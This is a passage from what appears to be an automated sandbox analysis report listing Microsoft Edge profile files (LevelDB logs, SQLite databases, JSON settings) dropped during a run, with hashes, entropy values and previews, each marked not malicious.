                                                                                                                                                                                                                                                                                                  SSDEEP:6:Xfh9+q2P923oH+TcwtzjqEKj0QMxIFUt8qkFkJZmw+qy9VkwO923oH+TcwtzjqEr:J4v4YebvqBZFUt8VyJ/+xD5LYebvqBaJ
                                                                                                                                                                                                                                                                                                  MD5:8E211CF8CE7D9584853A2422C3DAB866
                                                                                                                                                                                                                                                                                                  SHA1:2BCF6FB935D3F9BFA0AB64082FD4EDDB357C3304
                                                                                                                                                                                                                                                                                                  SHA-256:53FD71B289CC46D8B977523E8689C790F80A89C8C5E034C98570A4563F246338
                                                                                                                                                                                                                                                                                                  SHA-512:6EE659EBF5B9F4AB28F52EFCDDC423C753D9E10EF324A6A1DF6062CBB35D4530CF12AF28BC434D4DEABE3523A9E804E52C2E003CD370209CD2C669A68EECBDB0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:40.789 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/23-00:24:40.790 1db8 Recovering log #3.2024/12/23-00:24:40.793 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):325
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0519654205849305
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:D3+q2P923oH+TcwtpIFUt80M2WZmw+0M9VkwO923oH+Tcwta/WLJ:D3+v4YebmFUt80/W/+0aV5LYebaUJ
                                                                                                                                                                                                                                                                                                  MD5:C31F1783998169980E0E1F4A52130F6F
                                                                                                                                                                                                                                                                                                  SHA1:045B1FECE4DF21673D821A062BD46BC2A299AA84
                                                                                                                                                                                                                                                                                                  SHA-256:93789456437238A149E41986E17049F078CD3F4A3BF1632EE9B322EA18606296
                                                                                                                                                                                                                                                                                                  SHA-512:3B94C83523F0825F4CFAA96AEB99CC965651C443709B8AF5AD8B1CE64061C8024847DA48EF5BE82E30E6EC2B8CAA0D18EC28C5279F5A94581E0853975B484A77
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.013 aec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/23-00:24:20.014 aec Recovering log #3.2024/12/23-00:24:20.014 aec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):325
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0519654205849305
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:D3+q2P923oH+TcwtpIFUt80M2WZmw+0M9VkwO923oH+Tcwta/WLJ:D3+v4YebmFUt80/W/+0aV5LYebaUJ
                                                                                                                                                                                                                                                                                                  MD5:C31F1783998169980E0E1F4A52130F6F
                                                                                                                                                                                                                                                                                                  SHA1:045B1FECE4DF21673D821A062BD46BC2A299AA84
                                                                                                                                                                                                                                                                                                  SHA-256:93789456437238A149E41986E17049F078CD3F4A3BF1632EE9B322EA18606296
                                                                                                                                                                                                                                                                                                  SHA-512:3B94C83523F0825F4CFAA96AEB99CC965651C443709B8AF5AD8B1CE64061C8024847DA48EF5BE82E30E6EC2B8CAA0D18EC28C5279F5A94581E0853975B484A77
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.013 aec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/23-00:24:20.014 aec Recovering log #3.2024/12/23-00:24:20.014 aec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2651197155152976
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:8/2qOB1nxCkMzSAELyKOMq+8yC8F/YfU5m+OlTLVuma:Bq+n0Jz9ELyKOMq+8y9/OwV
                                                                                                                                                                                                                                                                                                  MD5:189E622A20539385406A4E2B93D77FEA
                                                                                                                                                                                                                                                                                                  SHA1:C767A9909D2B01EEEC30C661953446F81989C53E
                                                                                                                                                                                                                                                                                                  SHA-256:073F92A88850AA2C355B28011592202C2CD367D99CB152BCB31A0D4FD361D458
                                                                                                                                                                                                                                                                                                  SHA-512:9F975FFBC2A834D827D7F46CA0863ABB9A785D639C47BD56BE8072B958FD365DF78EA1F9DB649A96C8F65A0FA4E844E41169E00909C31D17625889DF44FD1C3F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4669319635417868
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0fCn:v7doKsKuKZKlZNmu46yjx0fu
                                                                                                                                                                                                                                                                                                  MD5:F83F68BD3B7EEB4FBA0FE0FEC1E8C23C
                                                                                                                                                                                                                                                                                                  SHA1:B13A58CE9B3A79F24E31927D4AC288FA3F5F3A6F
                                                                                                                                                                                                                                                                                                  SHA-256:135932E2A78A644BA6DC724352E5076D9AE9B8C3B75691EC3F4F9A42660FE838
                                                                                                                                                                                                                                                                                                  SHA-512:EDF7368601D172B24409913827D57B87FC99824ACE5676C6418BABCB09B72286C5C77CA2965B552D16DEA3C2C8221D2EF263FD74366535B28B446C728F3004F9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager-journal

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.13766033093567093
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:MNllv/etXlfEzj234//l/h4jRfn1d7jdtQfZlH9yczjSsXtXlfyczx:9lczK4puj3dndcl0czxl6czx
                                                                                                                                                                                                                                                                                                  MD5:84B2BAB2BF9BEC8E0F511FDF52132E06
                                                                                                                                                                                                                                                                                                  SHA1:0A3B25AEFAFE1FD7AD87BB737D91F1F4CF835DA7
                                                                                                                                                                                                                                                                                                  SHA-256:3CE6F18B13617126329B8C9CEAE5FC1F90E2C0E4B825DAB06BDFAB25A16C41D0
                                                                                                                                                                                                                                                                                                  SHA-512:12FB56EBF7489667CD8D372317EC81433242CB90FCE95E4E0F6181699F584DD3584EE923FAC230A835770A21E9070B8A63528B2407194FDDE855604BCA50E4F4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.............R&.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b15a59a0-7c76-436a-9217-b8ee23c3d4c2.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40503
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.561510525674463
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:WUxl/V7pLGLh2YWPrXf0d8F1+UoAYDCx9Tuqh0VfUC9xbog/OVCHgXWKsrws6jxd:WUxl/jch2YWPrXf0du1jafHgmKFs6jy6
                                                                                                                                                                                                                                                                                                  MD5:01D61B6FAA23A5A689AD9EF7294B57E8
                                                                                                                                                                                                                                                                                                  SHA1:6B8A4F8A03DD35E8731B076E05CA2F4F38BD6497
                                                                                                                                                                                                                                                                                                  SHA-256:BCD0D946855FA5AF58E045A08C9F99D4A1C738FF2FB57260685A643E3D80D0F7
                                                                                                                                                                                                                                                                                                  SHA-512:DDBDD9E5D059D55BB1FD75F3B31FB1EA85B1F994DC2510AB24B40289E965365157608CF0C6BEC5C454C71E6C276A3BA4FF0C454065D4A915F83AC2CEC94A96D8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379405059999046","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379405059999046","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.10257948433074167
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Gu0QS10L0QS1s/589XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/c:+xGspEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                                                                                                                                                  MD5:F51F935817943B5896D162B9C9245855
                                                                                                                                                                                                                                                                                                  SHA1:971891689BAB15E371377A9CC04911C834584ED9
                                                                                                                                                                                                                                                                                                  SHA-256:AA87E6C487CAB8B4BB25ADAAD97835F8077C9CD76842A458C388CBD8253DF399
                                                                                                                                                                                                                                                                                                  SHA-512:B7D99CABEDDE823F08C9A76E3152C7D77F2846A09B9015CF7A6AD612FAA13804378AB2EA46B82B2CB22C35788666611DBE749F5583379FC4A4C6F5C3A54355C8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:..-.............M.......6.p.~p...4..}....w.%x1...-.............M.......6.p.~p...4..}....w.%x1.........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):317272
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8904336041213913
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:G2DLRIRM4oMHtMDtMM8+qM0hIM1SgMlGnMgNS1eMkWv81yNyMKyTyxiy4xy7w:KY619AwnLaF
                                                                                                                                                                                                                                                                                                  MD5:B0D10A6C7B14F90DA597C1186419DDD6
                                                                                                                                                                                                                                                                                                  SHA1:2BA9ED1944FFB083D5CA4A859FA28B3C67B7C0E2
                                                                                                                                                                                                                                                                                                  SHA-256:0CB0D6007900D2ACE05F1E72E292307603B1F8263C8B5A85E751B59535057C82
                                                                                                                                                                                                                                                                                                  SHA-512:6FCF9B423A78FF03943E31023D3724DDECFFA30CA9438CF947DF84DCAC45769ED93ABC1A06735DDF284964080EFF14B845CB66363DDD9417F676C835C6B457C8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):628
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2378975358599957
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuuuuuGe8Q:iDOE
                                                                                                                                                                                                                                                                                                  MD5:9995305AD34C48B5635D1362974E61CC
                                                                                                                                                                                                                                                                                                  SHA1:469135E21F63DB5F07645B7FC0D06306386753EA
                                                                                                                                                                                                                                                                                                  SHA-256:BFF44ED12E4B336F6E90E3E51687EB37B02787F503B89B14398ACFB3D257FE7C
                                                                                                                                                                                                                                                                                                  SHA-512:A267782C728F3F0AE9B6CA9652954D308123FCF3F82541E78C6F903B879FAA7B447328FAC13E665648002B06AA25AC1BC429C9584AB7FA4192015CBF2C31E3CA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=................v..0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.147496867778144
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:eq2P923oH+TcwtfrK+IFUt8wZmw+4kwO923oH+TcwtfrUeLJ:ev4Yeb23FUt8w/+45LYeb3J
                                                                                                                                                                                                                                                                                                  MD5:E4A9E7761F464CCEF5E4914B786C1ABC
                                                                                                                                                                                                                                                                                                  SHA1:76A0890246E1969F643D2FD160A6942D3FAEDEB7
                                                                                                                                                                                                                                                                                                  SHA-256:2F670EA21A393E11F150E531E5F49FD53AABD8857FBA1D3054BE0216F9AE9307
                                                                                                                                                                                                                                                                                                  SHA-512:C4D5D53E19425D1D4954D4FA8A97F7000619A973BAE1FF97B136B06A30F1F19ABAD94FD0AB31AE7DDC6D5C01ACBC37B2B52BB29062D669A291BD183306A61C69
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.479 1c34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/23-00:24:20.480 1c34 Recovering log #3.2024/12/23-00:24:20.480 1c34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.147496867778144
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:eq2P923oH+TcwtfrK+IFUt8wZmw+4kwO923oH+TcwtfrUeLJ:ev4Yeb23FUt8w/+45LYeb3J
                                                                                                                                                                                                                                                                                                  MD5:E4A9E7761F464CCEF5E4914B786C1ABC
                                                                                                                                                                                                                                                                                                  SHA1:76A0890246E1969F643D2FD160A6942D3FAEDEB7
                                                                                                                                                                                                                                                                                                  SHA-256:2F670EA21A393E11F150E531E5F49FD53AABD8857FBA1D3054BE0216F9AE9307
                                                                                                                                                                                                                                                                                                  SHA-512:C4D5D53E19425D1D4954D4FA8A97F7000619A973BAE1FF97B136B06A30F1F19ABAD94FD0AB31AE7DDC6D5C01ACBC37B2B52BB29062D669A291BD183306A61C69
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.479 1c34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/23-00:24:20.480 1c34 Recovering log #3.2024/12/23-00:24:20.480 1c34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):787
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                                  MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                                  SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                                  SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                                  SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):342
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.122225585429704
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:rIq2P923oH+TcwtfrzAdIFUt8F9Zmw+FPkwO923oH+TcwtfrzILJ:rIv4Yeb9FUt8F9/+FP5LYeb2J
                                                                                                                                                                                                                                                                                                  MD5:01C36B30A2848EACFBB7001AAA6BB81B
                                                                                                                                                                                                                                                                                                  SHA1:69B4A9F10D92FD1152CCF1ED66BCBCECB31C2AB6
                                                                                                                                                                                                                                                                                                  SHA-256:5FA766D648ABCE401E5361F07AF5CBAB3AFDAB7B72E529E19D25C15252E8F02E
                                                                                                                                                                                                                                                                                                  SHA-512:686B7977E21B653CB69C9BD281AC8467601266131988DAABB85489ACB58A92B66AFD14610E4B8CAEBB93459B495AF83CBE29B6ACDFFF7BE3271DF7C8585B53E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.473 1c34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/23-00:24:20.474 1c34 Recovering log #3.2024/12/23-00:24:20.474 1c34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):342
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.122225585429704
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:rIq2P923oH+TcwtfrzAdIFUt8F9Zmw+FPkwO923oH+TcwtfrzILJ:rIv4Yeb9FUt8F9/+FP5LYeb2J
